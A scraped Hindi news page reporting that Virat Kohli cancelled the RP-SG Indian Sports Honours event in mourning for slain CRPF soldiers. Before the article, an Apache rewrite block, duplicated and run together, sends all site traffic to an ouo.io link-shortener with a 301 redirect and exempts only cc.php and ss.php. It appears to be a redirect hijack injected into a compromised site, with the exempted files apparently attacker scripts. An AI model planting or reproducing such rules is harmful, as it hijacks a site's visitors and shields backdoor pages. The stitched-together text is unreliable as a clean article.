
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 519
Nextविराट कोहली एक बड़ा फैसला लेते हुए उनकी फाउंडेशन द्वारा दिए जाने वाले इंडियन स्पोर्ट्स ऑनर पुरस्कारों को रद्द कर दिया है। अब ये पुरस्कार बाद में दिए जाएंगे। बता दें कि यह पुरस्कार शनिवार (16 फरवरी) को दिए जाने थे।
भारतीय खेल सम्मान आरपी-संजीव गोयनका ग्रुप और विराट कोहली फाउंडेशन का संयुक्त प्रयास है।विराट कोहली ने यह फैसला सीआरपीएफ जवानों की शहादत का सम्मान करते हुए लिया है। उन्होंने टि्वटर पर इस बात की जानकारी दी है। उन्होंने आरपी-एसजी स्पोर्ट्स ऑनर ईवेंट को रद्द करने की घोषणा की है। उन्होंने टि्वटर पर लिखा- दुख के इन पलों में हमने इस ईवेंट को रद्द कर दिया है। यह ईवेंट आज होना था।
उन्होंने कहा, '' इस कार्यक्रम में मनोरंजन और खेल जगत से जुड़ी दिग्गज हस्तियों को शामिल होना था। सम्मान समारोह से जुड़े हर साझेदार, सभी खिलाड़ियों और प्रतिनिधियों को इसकी सूचना दे दी गई है। जब भारत अपने जवानों की शहादत पर शोक मना रहा है, ऐसे समय में हमें कार्यक्रम की मेजबानी करना स्वीकार्य नहीं है।''